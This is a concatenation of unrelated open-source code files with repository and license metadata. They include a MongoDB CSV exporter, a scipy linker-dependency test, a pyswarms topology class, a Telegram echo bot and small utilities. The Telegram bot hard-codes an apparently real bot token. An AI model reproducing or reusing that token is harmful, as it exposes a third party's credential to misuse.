LLVM_REPO = os.path.join(REPO_BASE, "llvm")
LLVM_DATAFORMATTER_PATH = os.path.join(LLVM_REPO, "utils",
"lldbDataFormatters.py")
def import_llvm_dataformatters(debugger):
if not os.access(LLVM_DATAFORMATTER_PATH, os.F_OK):
print("WARNING! Could not find LLVM data formatters!")
return
cmd = 'command script import {}'.format(LLVM_DATAFORMATTER_PATH)
debugger.HandleCommand(cmd)
print("Loaded LLVM data formatters.")
def __lldb_init_module(debugger, internal_dict):
import_llvm_dataformatters(debugger)
| apache-2.0 | Python | |
e0db4982016a724c368feafbe4182016dc0fa67d | Create mongo_to_csv.py | rayidghani/database-utilities,rayidghani/database-utilities | mongo_to_csv.py | mongo_to_csv.py | import unicodecsv
import sys
from pymongo import MongoClient
# call this with 3 arguments: 1) mongodb uri 2) collection nam e3) output filename
class generic_converter:
def __init__(self):
self.header_dict = {}
def retrieve_headers(self, test_dict, name_var):
for element in test_dict:
if isinstance(test_dict[element], dict):
self.retrieve_headers(test_dict[element], name_var +
'||' + element)
else:
self.header_dict[name_var + '||' + element] = test_dict[element]
def converter_main(self, csv_writer):
mongo_uri_or_db_name = sys.argv[1]
if mongo_uri_or_db_name.startswith("mongodb://"): # mongodb uri given
client = MongoClient(mongo_uri_or_db_name)
db = client[mongo_uri_or_db_name.split("/")[-1]]
else: # database name given
client = MongoClient()
db = client[mongo_uri_or_db_name]
collection_obj = db[sys.argv[2]]
cursor_records = collection_obj.find()
header_list = []
for cursor in cursor_records:
self.retrieve_headers(cursor, '')
for item_label in self.header_dict:
if item_label not in header_list:
header_list.append(item_label)
self.header_dict = {}
csv_writer.writerow(header_list)
cursor_records = collection_obj.find()
for cursor in cursor_records:
row_to_push = []
self.header_dict = {}
self.retrieve_headers(cursor, '')
for item_label in header_list:
if item_label in self.header_dict:
row_to_push.append(self.header_dict[item_label])
else:
row_to_push.append('')
csv_writer.writerow(row_to_push)
def main():
f_write = open(sys.argv[3], 'wb')
csv_writer = unicodecsv.writer(f_write, delimiter=',', quotechar='"')
converter_object = generic_converter()
converter_object.converter_main(csv_writer)
if __name__ == '__main__':
main()
| mit | Python | |
f5c8f8d819143b4a49064847a6eb1a7813a3f06b | Create solution.py | lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges | hackerrank/algorithms/sorting/easy/closest_numbers/py/solution.py | hackerrank/algorithms/sorting/easy/closest_numbers/py/solution.py | #!/bin/python
size = int(raw_input())
values = sorted([int(value) for value in raw_input().split()][:size])
differences = sorted([(values[i - 1], values[i]) for i in range(1, len(values))], key = lambda x : abs(x[0] - x[1]))
i = 1
while (i < len(differences)
and abs(differences[i][0] - differences[i][1]) == abs(differences[i - 1][0] - differences[i - 1][1])):
i += 1
smallestDifferences = differences[:i]
print " ".join(" ".join(str(value) for value in difference) for difference in smallestDifferences)
| mit | Python | |
823bf93a9d931ed106ac4ed83f0448215c38580a | Create network_auth.py | MatthewLavine/NetworkAuth | network_auth.py | network_auth.py | #!/usr/bin/python
# Authenticates against a LAN using HTTP Basic Auth
import sys
# Validate CLI usage before importing requests so a bad invocation fails fast
# even when the dependency is missing.
if len(sys.argv) != 4:
    print ("Invalid arguments")
    print ("Proper syntax is: " + sys.argv[0] + " [url] [username] [password]")
    sys.exit(1)
import requests
import requests.exceptions
auth_target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
# First probe without credentials to see whether authentication is needed.
# Exit codes: 2/3 network/timeout on probe, 98 unexpected probe failure.
print ("Checking connection to: " + auth_target)
try:
    auth_check = requests.get(auth_target)
except requests.exceptions.ConnectionError as e:
    print (e)
    sys.exit(2)
except requests.exceptions.Timeout as e:
    print (e)
    sys.exit(3)
except Exception as e:
    print (e)
    sys.exit(98)
check_status = auth_check.status_code
print ("Response status code is: " + str(check_status))
if check_status == 200:
    print ("You are already authenticated")
    sys.exit(0)
# Second request with HTTP Basic Auth credentials.
# Exit codes: 4/5 network/timeout on auth, 99 unexpected auth failure.
print ("Authenticating...")
try:
    do_auth = requests.get(auth_target, auth=(username, password))
except requests.exceptions.ConnectionError as e:
    print (e)
    sys.exit(4)
except requests.exceptions.Timeout as e:
    print (e)
    sys.exit(5)
except Exception as e:
    print (e)
    sys.exit(99)
auth_status = do_auth.status_code
if auth_status == 200:
    print ("Authentication successful")
else:
    print ("Authentication failed with response code: " + str(auth_status))
0cad5e1673069d0fb8f2abb4eb6b062e3461fb70 | Add fortran ABI mismatch test for scipy.linalg. | mikebenfield/scipy,ChanderG/scipy,chatcannon/scipy,juliantaylor/scipy,newemailjdm/scipy,sonnyhu/scipy,WarrenWeckesser/scipy,mhogg/scipy,arokem/scipy,newemailjdm/scipy,FRidh/scipy,Eric89GXL/scipy,mgaitan/scipy,pschella/scipy,larsmans/scipy,anntzer/scipy,pizzathief/scipy,chatcannon/scipy,mortonjt/scipy,vigna/scipy,sriki18/scipy,scipy/scipy,sriki18/scipy,haudren/scipy,jamestwebber/scipy,niknow/scipy,tylerjereddy/scipy,maciejkula/scipy,ogrisel/scipy,fernand/scipy,josephcslater/scipy,ales-erjavec/scipy,josephcslater/scipy,dominicelse/scipy,ChanderG/scipy,ilayn/scipy,jor-/scipy,ilayn/scipy,aman-iitj/scipy,FRidh/scipy,vberaudi/scipy,larsmans/scipy,mortada/scipy,lukauskas/scipy,lukauskas/scipy,haudren/scipy,aman-iitj/scipy,futurulus/scipy,raoulbq/scipy,vanpact/scipy,zaxliu/scipy,scipy/scipy,e-q/scipy,vberaudi/scipy,matthewalbani/scipy,haudren/scipy,petebachant/scipy,dominicelse/scipy,nmayorov/scipy,maciejkula/scipy,person142/scipy,njwilson23/scipy,maciejkula/scipy,josephcslater/scipy,lhilt/scipy,ogrisel/scipy,felipebetancur/scipy,gertingold/scipy,niknow/scipy,aeklant/scipy,woodscn/scipy,rgommers/scipy,felipebetancur/scipy,newemailjdm/scipy,nvoron23/scipy,fredrikw/scipy,mdhaber/scipy,FRidh/scipy,njwilson23/scipy,Newman101/scipy,trankmichael/scipy,pnedunuri/scipy,maciejkula/scipy,mhogg/scipy,Shaswat27/scipy,anielsen001/scipy,grlee77/scipy,sonnyhu/scipy,mikebenfield/scipy,Srisai85/scipy,pyramania/scipy,bkendzior/scipy,jsilter/scipy,aarchiba/scipy,piyush0609/scipy,zxsted/scipy,hainm/scipy,trankmichael/scipy,person142/scipy,WarrenWeckesser/scipy,andyfaff/scipy,Srisai85/scipy,sonnyhu/scipy,person142/scipy,cpaulik/scipy,njwilson23/scipy,maniteja123/scipy,befelix/scipy,WillieMaddox/scipy,matthewalbani/scipy,zaxliu/scipy,trankmichael/scipy,petebachant/scipy,jjhelmus/scipy,argriffing/scipy,grlee77/scipy,argriffing/scipy,minhlongdo/scipy,pyramania/scipy,fredrikw/scipy,jseabold/scipy,rmcgibbo/s
cipy,jonycgn/scipy,vhaasteren/scipy,tylerjereddy/scipy,mdhaber/scipy,dch312/scipy,andyfaff/scipy,gertingold/scipy,Newman101/scipy,WarrenWeckesser/scipy,rmcgibbo/scipy,Shaswat27/scipy,vhaasteren/scipy,anntzer/scipy,haudren/scipy,jjhelmus/scipy,perimosocordiae/scipy,fernand/scipy,ndchorley/scipy,WillieMaddox/scipy,lukauskas/scipy,newemailjdm/scipy,aman-iitj/scipy,bkendzior/scipy,endolith/scipy,futurulus/scipy,Kamp9/scipy,mdhaber/scipy,larsmans/scipy,pizzathief/scipy,mortonjt/scipy,jamestwebber/scipy,teoliphant/scipy,zerothi/scipy,matthewalbani/scipy,richardotis/scipy,jseabold/scipy,ales-erjavec/scipy,mortada/scipy,arokem/scipy,kalvdans/scipy,jonycgn/scipy,aeklant/scipy,juliantaylor/scipy,arokem/scipy,giorgiop/scipy,jonycgn/scipy,arokem/scipy,Kamp9/scipy,fernand/scipy,Dapid/scipy,gertingold/scipy,bkendzior/scipy,nvoron23/scipy,Dapid/scipy,jsilter/scipy,vigna/scipy,jseabold/scipy,vhaasteren/scipy,pbrod/scipy,bkendzior/scipy,juliantaylor/scipy,mikebenfield/scipy,vigna/scipy,raoulbq/scipy,njwilson23/scipy,arokem/scipy,gfyoung/scipy,lukauskas/scipy,befelix/scipy,chatcannon/scipy,scipy/scipy,hainm/scipy,mortada/scipy,vanpact/scipy,mingwpy/scipy,scipy/scipy,ndchorley/scipy,zaxliu/scipy,cpaulik/scipy,vanpact/scipy,ilayn/scipy,haudren/scipy,mgaitan/scipy,pbrod/scipy,pbrod/scipy,Gillu13/scipy,rmcgibbo/scipy,vberaudi/scipy,fernand/scipy,lhilt/scipy,mgaitan/scipy,josephcslater/scipy,surhudm/scipy,mortada/scipy,Eric89GXL/scipy,aman-iitj/scipy,fernand/scipy,behzadnouri/scipy,WarrenWeckesser/scipy,maciejkula/scipy,ogrisel/scipy,kalvdans/scipy,futurulus/scipy,richardotis/scipy,ilayn/scipy,Dapid/scipy,anielsen001/scipy,juliantaylor/scipy,witcxc/scipy,felipebetancur/scipy,Eric89GXL/scipy,FRidh/scipy,tylerjereddy/scipy,ales-erjavec/scipy,minhlongdo/scipy,newemailjdm/scipy,endolith/scipy,endolith/scipy,nvoron23/scipy,petebachant/scipy,kleskjr/scipy,larsmans/scipy,kalvdans/scipy,fredrikw/scipy,minhlongdo/scipy,efiring/scipy,larsmans/scipy,sriki18/scipy,Newman101/scipy,pnedunuri/scipy,zaxl
iu/scipy,pbrod/scipy,lhilt/scipy,Dapid/scipy,cpaulik/scipy,felipebetancur/scipy,argriffing/scipy,mgaitan/scipy,Eric89GXL/scipy,teoliphant/scipy,gertingold/scipy,efiring/scipy,mingwpy/scipy,aeklant/scipy,jseabold/scipy,mortada/scipy,surhudm/scipy,mortonjt/scipy,nonhermitian/scipy,ilayn/scipy,gef756/scipy,chatcannon/scipy,jonycgn/scipy,fredrikw/scipy,jsilter/scipy,aarchiba/scipy,jseabold/scipy,Newman101/scipy,apbard/scipy,vberaudi/scipy,richardotis/scipy,maniteja123/scipy,josephcslater/scipy,gdooper/scipy,rgommers/scipy,piyush0609/scipy,andim/scipy,surhudm/scipy,sargas/scipy,aarchiba/scipy,efiring/scipy,nmayorov/scipy,cpaulik/scipy,matthewalbani/scipy,Shaswat27/scipy,nmayorov/scipy,person142/scipy,mhogg/scipy,gef756/scipy,felipebetancur/scipy,raoulbq/scipy,mgaitan/scipy,Stefan-Endres/scipy,Stefan-Endres/scipy,behzadnouri/scipy,mortonjt/scipy,hainm/scipy,ChanderG/scipy,Gillu13/scipy,fredrikw/scipy,zerothi/scipy,Kamp9/scipy,vhaasteren/scipy,witcxc/scipy,woodscn/scipy,Stefan-Endres/scipy,teoliphant/scipy,vanpact/scipy,Kamp9/scipy,rgommers/scipy,sauliusl/scipy,endolith/scipy,e-q/scipy,sargas/scipy,petebachant/scipy,jakevdp/scipy,surhudm/scipy,rgommers/scipy,kleskjr/scipy,jonycgn/scipy,anntzer/scipy,nvoron23/scipy,aeklant/scipy,hainm/scipy,jonycgn/scipy,e-q/scipy,zxsted/scipy,behzadnouri/scipy,richardotis/scipy,sargas/scipy,lukauskas/scipy,teoliphant/scipy,woodscn/scipy,grlee77/scipy,sriki18/scipy,gef756/scipy,scipy/scipy,pnedunuri/scipy,gef756/scipy,aarchiba/scipy,gfyoung/scipy,zxsted/scipy,ortylp/scipy,ortylp/scipy,zaxliu/scipy,efiring/scipy,gdooper/scipy,matthew-brett/scipy,futurulus/scipy,minhlongdo/scipy,Gillu13/scipy,nonhermitian/scipy,vberaudi/scipy,raoulbq/scipy,maniteja123/scipy,sargas/scipy,fernand/scipy,andim/scipy,felipebetancur/scipy,perimosocordiae/scipy,matthew-brett/scipy,sonnyhu/scipy,rmcgibbo/scipy,pyramania/scipy,giorgiop/scipy,dominicelse/scipy,apbard/scipy,nonhermitian/scipy,niknow/scipy,ortylp/scipy,WillieMaddox/scipy,pizzathief/scipy,mtrbean/scipy,wi
tcxc/scipy,argriffing/scipy,apbard/scipy,matthew-brett/scipy,sauliusl/scipy,mhogg/scipy,Stefan-Endres/scipy,mdhaber/scipy,WarrenWeckesser/scipy,behzadnouri/scipy,endolith/scipy,grlee77/scipy,raoulbq/scipy,niknow/scipy,befelix/scipy,mingwpy/scipy,zxsted/scipy,FRidh/scipy,mingwpy/scipy,anielsen001/scipy,dominicelse/scipy,e-q/scipy,jor-/scipy,ndchorley/scipy,andyfaff/scipy,Shaswat27/scipy,sonnyhu/scipy,lhilt/scipy,sriki18/scipy,pizzathief/scipy,andim/scipy,WarrenWeckesser/scipy,pyramania/scipy,anielsen001/scipy,mhogg/scipy,sauliusl/scipy,sauliusl/scipy,sargas/scipy,anielsen001/scipy,kalvdans/scipy,mingwpy/scipy,aarchiba/scipy,Srisai85/scipy,minhlongdo/scipy,anntzer/scipy,rmcgibbo/scipy,chatcannon/scipy,rmcgibbo/scipy,e-q/scipy,ortylp/scipy,mdhaber/scipy,mgaitan/scipy,zxsted/scipy,ortylp/scipy,futurulus/scipy,niknow/scipy,argriffing/scipy,andim/scipy,hainm/scipy,person142/scipy,giorgiop/scipy,mtrbean/scipy,surhudm/scipy,Gillu13/scipy,pnedunuri/scipy,jakevdp/scipy,mtrbean/scipy,gef756/scipy,tylerjereddy/scipy,FRidh/scipy,juliantaylor/scipy,mtrbean/scipy,mortonjt/scipy,vhaasteren/scipy,trankmichael/scipy,nvoron23/scipy,Eric89GXL/scipy,jseabold/scipy,haudren/scipy,zerothi/scipy,Gillu13/scipy,pschella/scipy,vigna/scipy,mdhaber/scipy,lhilt/scipy,ales-erjavec/scipy,ales-erjavec/scipy,mortada/scipy,nonhermitian/scipy,jamestwebber/scipy,andyfaff/scipy,matthew-brett/scipy,cpaulik/scipy,andyfaff/scipy,vanpact/scipy,argriffing/scipy,zxsted/scipy,gfyoung/scipy,dch312/scipy,Newman101/scipy,aeklant/scipy,sriki18/scipy,nvoron23/scipy,hainm/scipy,anntzer/scipy,perimosocordiae/scipy,behzadnouri/scipy,sonnyhu/scipy,gdooper/scipy,Stefan-Endres/scipy,woodscn/scipy,apbard/scipy,jjhelmus/scipy,futurulus/scipy,WillieMaddox/scipy,njwilson23/scipy,befelix/scipy,efiring/scipy,kalvdans/scipy,kleskjr/scipy,dominicelse/scipy,befelix/scipy,Gillu13/scipy,surhudm/scipy,ortylp/scipy,teoliphant/scipy,sauliusl/scipy,Dapid/scipy,jakevdp/scipy,mtrbean/scipy,kleskjr/scipy,Srisai85/scipy,piyush0609/scipy,jam
estwebber/scipy,Srisai85/scipy,Stefan-Endres/scipy,andyfaff/scipy,ales-erjavec/scipy,ChanderG/scipy,niknow/scipy,bkendzior/scipy,pbrod/scipy,richardotis/scipy,ndchorley/scipy,scipy/scipy,ChanderG/scipy,pnedunuri/scipy,jor-/scipy,jsilter/scipy,andim/scipy,ogrisel/scipy,jor-/scipy,giorgiop/scipy,maniteja123/scipy,mikebenfield/scipy,dch312/scipy,dch312/scipy,Srisai85/scipy,lukauskas/scipy,matthewalbani/scipy,zerothi/scipy,mikebenfield/scipy,maniteja123/scipy,gdooper/scipy,ndchorley/scipy,kleskjr/scipy,vhaasteren/scipy,nmayorov/scipy,mortonjt/scipy,richardotis/scipy,pschella/scipy,larsmans/scipy,vberaudi/scipy,jsilter/scipy,minhlongdo/scipy,perimosocordiae/scipy,pschella/scipy,nmayorov/scipy,Eric89GXL/scipy,Shaswat27/scipy,trankmichael/scipy,vanpact/scipy,nonhermitian/scipy,jjhelmus/scipy,andim/scipy,anielsen001/scipy,piyush0609/scipy,behzadnouri/scipy,Dapid/scipy,zerothi/scipy,ogrisel/scipy,jakevdp/scipy,apbard/scipy,tylerjereddy/scipy,mtrbean/scipy,woodscn/scipy,fredrikw/scipy,petebachant/scipy,woodscn/scipy,jor-/scipy,gertingold/scipy,ilayn/scipy,matthew-brett/scipy,ChanderG/scipy,giorgiop/scipy,perimosocordiae/scipy,jjhelmus/scipy,kleskjr/scipy,witcxc/scipy,zerothi/scipy,gfyoung/scipy,Newman101/scipy,sauliusl/scipy,endolith/scipy,raoulbq/scipy,perimosocordiae/scipy,ndchorley/scipy,mhogg/scipy,anntzer/scipy,piyush0609/scipy,aman-iitj/scipy,mingwpy/scipy,pizzathief/scipy,gef756/scipy,jakevdp/scipy,chatcannon/scipy,pyramania/scipy,dch312/scipy,njwilson23/scipy,witcxc/scipy,Shaswat27/scipy,cpaulik/scipy,gdooper/scipy,trankmichael/scipy,pbrod/scipy,pnedunuri/scipy,pschella/scipy,vigna/scipy,rgommers/scipy,WillieMaddox/scipy,piyush0609/scipy,gfyoung/scipy,WillieMaddox/scipy,giorgiop/scipy,aman-iitj/scipy,maniteja123/scipy,Kamp9/scipy,grlee77/scipy,jamestwebber/scipy,petebachant/scipy,zaxliu/scipy,efiring/scipy,Kamp9/scipy,newemailjdm/scipy | scipy/linalg/tests/test_build.py | scipy/linalg/tests/test_build.py | from subprocess import call, PIPE, Popen
import sys
import re
import numpy as np
from numpy.testing import TestCase, dec
from scipy.linalg import flapack
# XXX: this is copied from numpy trunk. Can be removed when we will depend on
# numpy 1.3
class FindDependenciesLdd:
    """Query the shared-library dependencies of a binary via the ``ldd`` tool.

    NOTE(review): written for Python 2 — under Python 3, ``ldd``'s stdout is
    bytes while the patterns in grep_dependencies are str; confirm before
    running on py3.
    """
    def __init__(self):
        self.cmd = ['ldd']
        # Probe once that ldd is runnable; the exit status itself is ignored.
        try:
            call(self.cmd, stdout=PIPE, stderr=PIPE)
        except OSError:
            raise RuntimeError("command %s cannot be run" % self.cmd)
    def get_dependencies(self, file):
        """Return the raw stdout of ``ldd <file>``.

        Raises RuntimeError when ldd exits non-zero.
        """
        p = Popen(self.cmd + [file], stdout=PIPE, stderr=PIPE)
        stdout, stderr = p.communicate()
        if not (p.returncode == 0):
            # BUG FIX: the message previously interpolated `libfile`, an
            # undefined name, so the failure path itself raised NameError.
            raise RuntimeError("Failed to check dependencies for %s" % file)
        return stdout
    def grep_dependencies(self, file, deps):
        """Return the subset of regex patterns *deps* found in ldd's output."""
        stdout = self.get_dependencies(file)
        rdeps = dict([(dep, re.compile(dep)) for dep in deps])
        founds = []
        for l in stdout.splitlines():
            for k, v in rdeps.items():
                if v.search(l):
                    founds.append(k)
        return founds
class TestF77Mismatch(TestCase):
    # Linux-only: relies on the ldd tool to inspect the shared-library
    # dependencies of the compiled flapack extension module.
    @dec.skipif(not(sys.platform[:5] == 'linux'),
    "Skipping fortran compiler mismatch on non Linux platform")
    def test_lapack(self):
        """Fail if flapack links both the g77 (libg2c) and gfortran runtimes."""
        f = FindDependenciesLdd()
        deps = f.grep_dependencies(flapack.__file__,
                ['libg2c', 'libgfortran'])
        # NOTE: failIf is the deprecated pre-2.7 spelling of assertFalse.
        self.failIf(len(deps) > 1,
"""Both g77 and gfortran runtimes linked in lapack_lite ! This is likely to
cause random crashes and wrong results. See numpy INSTALL.txt for more
information.""")
| bsd-3-clause | Python | |
6e1c43015beae6afbc7b351d19aa1d899678ca44 | Add Star class topology | ljvmiranda921/pyswarms,ljvmiranda921/pyswarms | pyswarms/backend/topology/star.py | pyswarms/backend/topology/star.py | # -*- coding: utf-8 -*-
"""
A Star Network Topology
This class implements a star topology where all particles are connected to
one another. This social behavior is often found in GlobalBest PSO
optimizers.
"""
# Import from stdlib
import logging
# Import modules
import numpy as np
# Import from package
from .. import operators as ops
from .base import Topology
# Create a logger
logger = logging.getLogger(__name__)
class Star(Topology):
    """Fully-connected ("star") swarm topology.
    Every particle is a neighbor of every other particle, so the social
    signal reduces to a single global best — the behavior used by
    GlobalBest-style PSO optimizers.
    """
    def __init__(self):
        super(Star, self).__init__()
    def compute_gbest(self, swarm):
        """Return the global best position and cost over the whole swarm.
        Parameters
        ----------
        swarm : pyswarms.backend.swarm.Swarm
            a Swarm instance
        Returns
        -------
        numpy.ndarray
            best position, of shape ``(n_dimensions,)``
        float
            best cost
        Raises
        ------
        AttributeError
            re-raised (after logging) when *swarm* lacks the ``pbest_*``
            attributes, i.e. it is not a proper Swarm instance.
        """
        try:
            winner = np.argmin(swarm.pbest_cost)
            gbest_pos = swarm.pbest_pos[winner]
            gbest_cost = swarm.pbest_cost[winner]
        except AttributeError:
            msg = 'Please pass a Swarm class. You passed {}'.format(type(swarm))
            logger.error(msg)
            raise
        return (gbest_pos, gbest_cost)
    def compute_velocity(self, swarm, clamp):
        """Compute and return the swarm's new velocity matrix.
        Delegates to ``pyswarms.backend.operators.compute_velocity``, which
        combines the cognitive and social terms of the swarm.
        Parameters
        ----------
        swarm : pyswarms.backend.swarms.Swarm
            a Swarm instance
        clamp : tuple of floats or None
            ``(min_velocity, max_velocity)`` limits for velocity clamping
        Returns
        -------
        numpy.ndarray
            updated velocity matrix
        """
        return ops.compute_velocity(swarm, clamp)
    def compute_position(self, swarm, bounds):
        """Compute and return the swarm's new position matrix.
        Delegates to ``pyswarms.backend.operators.compute_position``;
        positions that would leave *bounds* are not updated.
        Parameters
        ----------
        swarm : pyswarms.backend.swarms.Swarm
            a Swarm instance
        bounds : tuple of numpy.ndarray or list, optional
            ``(lower, upper)`` bounds, each of shape ``(dimensions,)``
        Returns
        -------
        numpy.ndarray
            new position matrix
        """
        return ops.compute_position(swarm, bounds)
096a1d94c2f54246d51954b59fc5c3fdb28154b2 | add persistence strategy enum | keenlabs/KeenClient-Python,isotoma/KeenClient-Python,ruleant/KeenClient-Python | keen/__init__.py | keen/__init__.py | __author__ = 'dkador'
class PersistenceStrategy:
    """
    An enum that defines the persistence strategy used by the KeenClient.
    Currently supported: DIRECT, which means any time add_event is called the
    client will call out directly to Keen, or REDIS, which means add_event
    will simply add the event to a defined Redis instance which can be
    cleared later.
    """
    # BUG FIX: a stray trailing comma previously made DIRECT the tuple (0,)
    # rather than the int 0, giving the two constants inconsistent types.
    DIRECT = 0
    REDIS = 1
| mit | Python |
295dc1e11563350181558001366275369df90639 | Add a sysutil module | sahg/SAHGutils | sahgutils/sysutil.py | sahgutils/sysutil.py | # System utility functions
from subprocess import Popen, PIPE
def exec_command(cmd_args):
    """Execute a shell command in a subprocess

    Convenience wrapper around subprocess to execute a shell command
    and pass back stdout, stderr, and the return code. This function
    waits for the subprocess to complete, before returning.

    Usage example:
    >>> stdout, stderr, retcode = exec_command(['ls', '-lhot'])

    Parameters
    ----------
    cmd_args : list of strings
        The args to pass to subprocess. The first arg is the program
        name.

    Returns
    -------
    stdout : string
        The contents of stdout produced by the shell command
    stderr : string
        The contents of stderr produced by the shell command
    retcode : int
        The return code produced by the shell command

    """
    proc = Popen(cmd_args, stdout=PIPE, stderr=PIPE)
    stdout, stderr = proc.communicate()
    # communicate() already waits for process termination and sets
    # returncode, so the original trailing proc.wait() was redundant.
    return stdout, stderr, proc.returncode
| bsd-3-clause | Python | |
74034ccc6d1b7436c81520fb287330b852d54c62 | Create a.py | cliali/py2 | a.py | a.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Simple Bot to reply to Telegram messages. This is built on the API wrapper, see
# echobot2.py to see the same example built on the telegram.ext bot framework.
# This program is dedicated to the public domain under the CC0 license.
import logging
import telegram
from telegram.error import NetworkError, Unauthorized
from time import sleep
update_id = None
def main():
    """Poll Telegram for updates forever and echo every message back."""
    global update_id
    # Telegram Bot Authorization Token
    # NOTE(review): a live bot token is hard-coded in source control —
    # it should be revoked and moved to configuration.
    bot = telegram.Bot('277679081:AAGk3IXlId9PKUn3n_5wrfrUIR_mgsUVCeE')
    # get the first pending update_id, this is so we can skip over it in case
    # we get an "Unauthorized" exception.
    try:
        update_id = bot.getUpdates()[0].update_id
    except IndexError:
        update_id = None
    logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    while True:
        try:
            echo(bot)
        except NetworkError:
            # Transient network problem: back off briefly and retry.
            sleep(1)
        except Unauthorized:
            # The user has removed or blocked the bot.
            update_id += 1
def echo(bot):
    """Fetch updates newer than the global *update_id* and reply with the same text."""
    global update_id
    # Request updates after the last update_id
    for update in bot.getUpdates(offset=update_id, timeout=10):
        # chat_id is required to reply to any message
        # NOTE(review): chat_id is unused, and .message is dereferenced here
        # before the `if update.message` guard below — confirm every update
        # carries a message at this API version.
        chat_id = update.message.chat_id
        update_id = update.update_id + 1
        if update.message:  # your bot can receive updates without messages
            # Reply to the message
            update.message.reply_text(update.message.text)
if __name__ == '__main__':
    main()
| apache-2.0 | Python | |
e2dbee01734a981e8fcbbdca7d7d96f0506f929b | Create b.py | ayst123/mooc,ayst123/mooc | b.py | b.py | b = 43
| bsd-2-clause | Python | |
def zee_special_divison_operator(exp_r, x):
    """Solve ``y * x == exp_r (mod 27644437)`` for y.

    27644437 is prime, so (for x not a multiple of it) x has a modular
    inverse, computed as ``x**(p-2) mod p`` by Fermat's little theorem.
    This replaces the original O(p) brute-force scan with an O(log p)
    computation.  The congruence has a unique solution mod p, so the
    result matches the old loop for every input the old loop could solve
    (it started at y=2 and so could never return 0 or 1).
    """
    p = 27644437
    return (exp_r * pow(x, p - 2, p)) % p
def test_special():
    """Known (divisor, result) pairs for the special division operator."""
    expected = {2: 13825167, 3: 9216778, 4: 20734802}
    for divisor, result in expected.items():
        assert result == zee_special_divison_operator(5897, divisor)
if __name__ == '__main__':
print(zee_special_divison_operator(5897, 7)) | mit | Python | |
e61dbf66d6f73e4999a5ff9f732a8df0637fdbf2 | Add an example of SQLalchemy model | raspberrywhite/raspberrywhite,raspberrywhite/raspberrywhite,raspberrywhite/raspberrywhite,raspberrywhite/raspberrywhite | server/models.py | server/models.py | from flask.ext.sqlalchemy import SQLAlchemy
# NOTE(review): `app` is referenced but never created or imported in this
# file; as written these lines raise NameError at import time.  A Flask app
# must be constructed (or imported) before this module is loaded.
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)
class User(db.Model):
    """Example SQLAlchemy model: a user with unique username and email."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True)
    email = db.Column(db.String(120), unique=True)
    def __init__(self, username, email):
        self.username = username
        self.email = email
    def __repr__(self):
        return '<User %r>' % self.username
b6fb4cadb9ac1506fef3a230ee7ec983daa64922 | Remove tail | monouno/site,Phoenix1369/site,monouno/site,monouno/site,Minkov/site,DMOJ/site,DMOJ/site,Minkov/site,Minkov/site,DMOJ/site,Phoenix1369/site,monouno/site,Phoenix1369/site,Phoenix1369/site,monouno/site,DMOJ/site,Minkov/site | judge/templatetags/markdown/lazy_load.py | judge/templatetags/markdown/lazy_load.py | from copy import deepcopy
from django.contrib.staticfiles.templatetags.staticfiles import static
from lxml import html
def lazy_load(tree):
    """Rewrite every external <img> in *tree* for lazy loading.

    The real URL moves to data-src, src becomes a blank placeholder, the
    'unveil' class is appended, and a <noscript> copy of the original tag
    is inserted before it as a no-JavaScript fallback.  data: URIs are
    left untouched.
    """
    placeholder = static('blank.gif')
    for image in tree.xpath('.//img'):
        source = image.get('src')
        if source.startswith('data'):
            continue
        fallback = html.Element('noscript')
        original = deepcopy(image)
        original.tail = ''
        fallback.append(original)
        image.addprevious(fallback)
        image.set('data-src', source)
        image.set('src', placeholder)
        css = image.get('class')
        image.set('class', css + ' unveil' if css else 'unveil')
| from copy import deepcopy
from django.contrib.staticfiles.templatetags.staticfiles import static
from lxml import html
def lazy_load(tree):
blank = static('blank.gif')
for img in tree.xpath('.//img'):
src = img.get('src')
if src.startswith('data'):
continue
noscript = html.Element('noscript')
noscript.append(deepcopy(img))
img.addprevious(noscript)
img.set('data-src', src)
img.set('src', blank)
img.set('class', img.get('class') + ' unveil' if img.get('class') else 'unveil')
| agpl-3.0 | Python |
eb145b78d4c84a29ee77fbe77142dee6f97f67dd | put urls and getter in its own file | apetrynet/filemail,apetrynet/pyfilemail,apetrynet/filemail | filemail/urls.py | filemail/urls.py | import os
from errors import FMConfigError
base_url = 'https://www.filemail.com'
# Relative endpoint path for every supported Filemail API action.
api_urls = {
    'login': 'api/authentication/login',
    'logout': 'api/authentication/logout',
    'init': 'api/transfer/initialize',
    'get': 'api/transfer/get',
    'complete': 'api/transfer/complete',
    'forward': 'api/transfer/forward',
    'share': 'api/transfer/share',
    'cancel': 'api/transfer/cancel',
    'delete': 'api/transfer/delete',
    'zip': 'api/transfer/zip',
    'file_rename': 'api/transfer/file/rename',
    'file_delete': 'api/transfer/file/delete',
    'update': 'api/transfer/update',
    'sent_get': 'api/transfer/sent/get',
    'received_get': 'api/transfer/received/get',
    'user_get': 'api/user/get',
    'user_update': 'api/user/update'
    }
def getURL(action):
    """Return the absolute Filemail endpoint URL for *action*.

    Raises
    ------
    FMConfigError
        when *action* is not a known API action.
    """
    if action in api_urls:
        # BUG FIX: the URL was built with os.path.join, which is
        # OS-dependent (backslash separator on Windows) and therefore
        # wrong for URLs; join with an explicit '/' instead.
        return '{0}/{1}'.format(base_url, api_urls[action])
    raise FMConfigError('You passed an invalid action: {}'.format(action))
| mit | Python | |
beb549ba090a1a72761a7e81feb3edcbf85ca543 | Add files via upload | yawatauma/hello-world | first_attempt.py | first_attempt.py | print("Hello world")
| mit | Python | |
036601c8172dc71f2ea106abdae9a157a8e60855 | update find best results | duguyue100/rolling | scripts/find-best.py | scripts/find-best.py | """
Find the best result from experiments.
Author: Yuhuang Hu
Email : duguyue100@gmail.com
"""
import sys;
import os;
from numba.cuda.cudadrv.nvvm import RESULT_CODE_NAMES
sys.path.append("..");
import argparse;
import cPickle as pickle;
import numpy as np;
import rolling.dataset as ds;
import rolling.draw as draw;
def search(results_path, network_type, batch_size, num_epochs):
    """
    Find all available results available in results destination
    Parameters
    ----------
    results_path : string
        destination of experiment results
    network_type : string
        feedforward or RNN
    batch_size : string
        batch size for each mini-batch samples
    num_epochs : string
        total number of training epochs
    Returns
    -------
    result_lit : List
